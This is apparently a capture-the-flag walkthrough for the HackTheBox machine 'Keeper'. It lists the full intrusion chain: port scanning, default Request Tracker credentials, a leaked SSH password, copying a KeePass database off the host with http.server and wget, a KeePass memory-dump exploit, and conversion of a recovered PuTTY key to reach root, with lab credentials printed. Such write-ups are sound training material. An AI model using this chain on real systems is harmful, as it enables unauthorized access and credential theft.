Skip to content

Latest commit

 

History

History
130 lines (71 loc) · 2.82 KB

README.md

File metadata and controls

130 lines (71 loc) · 2.82 KB
Raw

Keeper

nmap -p- --min-rate 5000 10.10.11.227 -Pn

alt text

After detection of open ports, let's do greater nmap scan.

nmap -A -sC -sV -p22,80 10.10.11.227

alt text

Let's browse web application for finding anything as interesting.

alt text

From here, I see that I need to add keeper.htb and tickets.keeper.htb domain names into /etc/hosts file for resolving purposes.

While browsing tickets.keeper.htb, I see some login page as below.

alt text

That's some CMS style application, let's search default credentials for RT software.

alt text

Hola! This default credentials root: password worked for our target.

alt text

As this user is root user, that's why we have privilege to access sensitive information of user. On description section, I see password of this user.

alt text

lnorgaard: Welcome2023!

Let's login into machine via ssh.

ssh lnorgaard@keeper.htb

user.txt

alt text

As you see, there's interesting file called RT30000.zip, we need to extract data from here.

Let's extract via unzip command.

alt text

From here, I download passcodes.kdbx file into my machine.

1.First, I open http.server .

python3 -m http.server --bind 10.10.11.227 8080

alt text

2.Then download this file via wget command.

wget http://10.10.11.227:8080/passcodes.kdbx

alt text

I tried this exploit for KeePass that, I can know password of this file and read all content from here.

Let's use this exploit.

python3 keepass_dump.py -f KeePassDumpFull.dmp

From here, I got dgrd med flde string and search meaning of this on Google.

alt text

I take really password as rødgrød med fløde and look this file via kpcli command.

kpcli --kdb /home/kali/Desktop/passcode.kdbx

alt text

From here I got credentials of root user

root: F4><3K0nd!

For reading this file content, I use online .kdbx file editor means to see content clearly via GUI.

alt text

But I need to get key file for OpenSSH to login into machine, but it is Putty.

Note: keygen.ppk file is thing I got from Notes section and I write type of key file as private-openssh and output is saved into id_rsa file.

puttygen keygen.ppk -O private-openssh -o id_rsa

alt text

Let's do 600 privilege for id_rsa file and login into machine.

chmod 600 id_rsa
ssh -i id_rsa keeper.htb

root.txt

alt text